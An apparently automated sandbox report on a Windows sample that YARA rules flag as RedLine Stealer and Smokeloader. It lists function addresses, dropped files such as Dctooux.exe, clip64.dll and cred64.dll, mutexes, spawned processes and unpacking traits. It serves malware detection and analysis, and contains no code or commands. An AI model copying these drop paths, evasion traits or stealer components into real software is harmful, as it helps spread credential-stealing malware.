Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_0044A2D9 0_2_0044A2D9
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00446438 0_2_00446438
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00429492 0_2_00429492
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00424902 0_2_00424902
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_0044AA2B 0_2_0044AA2B
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_0044AB4B 0_2_0044AB4B
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_0044BE90 0_2_0044BE90
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00404FE0 0_2_00404FE0
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_00445FA0 0_2_00445FA0
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02EE5247 0_2_02EE5247
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F26207 0_2_02F26207
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F1B3BA 0_2_02F1B3BA
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F0437A 0_2_02F0437A
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F07358 0_2_02F07358
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F2C0F7 0_2_02F2C0F7
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02EEA007 0_2_02EEA007
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F096F9 0_2_02F096F9
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F2A540 0_2_02F2A540
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F04B69 0_2_02F04B69
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F2AC92 0_2_02F2AC92
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02F2ADB2 0_2_02F2ADB2
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_00409DA0 22_2_00409DA0
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_004270F1 22_2_004270F1
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0043B153 22_2_0043B153
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_00424113 22_2_00424113
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0044A2D9 22_2_0044A2D9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_00446438 22_2_00446438
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_00429492 22_2_00429492
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_00424902 22_2_00424902
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0044AA2B 22_2_0044AA2B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0044AB4B 22_2_0044AB4B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0044BE90 22_2_0044BE90
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_00404FE0 22_2_00404FE0
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_00445FA0 22_2_00445FA0
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_03007358 22_2_03007358
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0300437A 22_2_0300437A
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_02FE5247 22_2_02FE5247
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0301B3BA 22_2_0301B3BA
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_03026207 22_2_03026207
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_02FEA007 22_2_02FEA007
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0302C0F7 22_2_0302C0F7
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_030096F9 22_2_030096F9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0302A540 22_2_0302A540
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_03004B69 22_2_03004B69
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0302ADB2 22_2_0302ADB2
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 22_2_0302AC92 22_2_0302AC92
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_00424113 31_2_00424113
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_0044A2D9 31_2_0044A2D9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_00446438 31_2_00446438
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_00424902 31_2_00424902
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_0044AA2B 31_2_0044AA2B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_0044AB4B 31_2_0044AB4B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_00404FE0 31_2_00404FE0
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_004270F1 31_2_004270F1
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_0043B153 31_2_0043B153
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_0040F410 31_2_0040F410
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_00429492 31_2_00429492
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_0044BE90 31_2_0044BE90
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_00445FA0 31_2_00445FA0
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049DA540 31_2_049DA540
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049B96F9 31_2_049B96F9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049DC0F7 31_2_049DC0F7
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_0499A007 31_2_0499A007
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049D6207 31_2_049D6207
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_04995247 31_2_04995247
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049CB3BA 31_2_049CB3BA
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049B7358 31_2_049B7358
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049B437A 31_2_049B437A
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049DAC92 31_2_049DAC92
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049DADB2 31_2_049DADB2
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 31_2_049B4B69 31_2_049B4B69
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: String function: 02F00EB9 appears 64 times
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: String function: 00421290 appears 41 times
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: String function: 0041B3C0 appears 123 times
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: String function: 02EFB627 appears 127 times
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: String function: 02F014F7 appears 38 times
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: String function: 00420C52 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 02FFB627 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 049B14F7 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 049AB627 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 03000EB9 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 00421290 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 049B0BBA appears 48 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 0041B3C0 appears 245 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 00420968 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 00420953 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 0043C0A3 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 0041ABA0 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 049B0EB9 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 030014F7 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 00420C52 appears 146 times
One or more processes crash
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7448 -s 744
PE file does not import any functions
Source: clip64[1].dll.31.dr Static PE information: No import functions for PE file found
Source: cred64[1].dll.31.dr Static PE information: No import functions for PE file found
Source: clip64.dll.31.dr Static PE information: No import functions for PE file found
Source: cred64.dll.31.dr Static PE information: No import functions for PE file found
PE file overlay found
Source: clip64[1].dll.31.dr Static PE information: Data appended to the last section found
Source: cred64[1].dll.31.dr Static PE information: Data appended to the last section found
Source: clip64.dll.31.dr Static PE information: Data appended to the last section found
Source: cred64.dll.31.dr Static PE information: Data appended to the last section found
Sample file is different than original file name gathered from version info
Source: fE7X8Fp2WG.exe, 00000000.00000000.1634062335.0000000002D41000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFires0 vs fE7X8Fp2WG.exe
Source: fE7X8Fp2WG.exe Binary or memory string: OriginalFilenameFires0 vs fE7X8Fp2WG.exe
Uses 32bit PE files
Source: fE7X8Fp2WG.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000000.00000002.1921606091.0000000002FA0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.1927120210.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000016.00000002.1927223132.00000000030A0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001F.00000002.2894078333.0000000003005000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1921437711.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001F.00000002.2894939498.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/73@1/1
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_02FA1756 CreateToolhelp32Snapshot,Module32First, 0_2_02FA1756
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Code function: 0_2_0040B375 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0040B375
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Roaming\810b84e2bfa3a9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Mutant created: \Sessions\1\BaseNamedObjects\810b84e2bfa3a9e2d0d81a3d2ea89e46
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7960
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7448
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7228
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe File created: C:\Users\user\AppData\Local\Temp\154561dcbf Jump to behavior
Source: fE7X8Fp2WG.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: fE7X8Fp2WG.exe ReversingLabs: Detection: 47%
Source: fE7X8Fp2WG.exe Virustotal: Detection: 49%
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe File read: C:\Users\user\Desktop\fE7X8Fp2WG.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\fE7X8Fp2WG.exe "C:\Users\user\Desktop\fE7X8Fp2WG.exe"
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7448 -s 744
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7448 -s 756
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7448 -s 860
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7448 -s 868
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7448 -s 864
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7448 -s 864
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7448 -s 1040
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7448 -s 1108
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7448 -s 1184
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7448 -s 1132
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe "C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe"
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7448 -s 744
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7228 -s 420
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7960 -s 548
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7960 -s 556
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7960 -s 596
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7960 -s 728
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Process created: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe "C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe" Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: fE7X8Fp2WG.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\vetejuso.pdb source: fE7X8Fp2WG.exe, Dctooux.exe.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\fE7X8Fp2WG.exe Unpacked PE file: 0.2.fE7X8Fp2WG.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 22.2.Dctooux.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 31.2.Dctooux.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
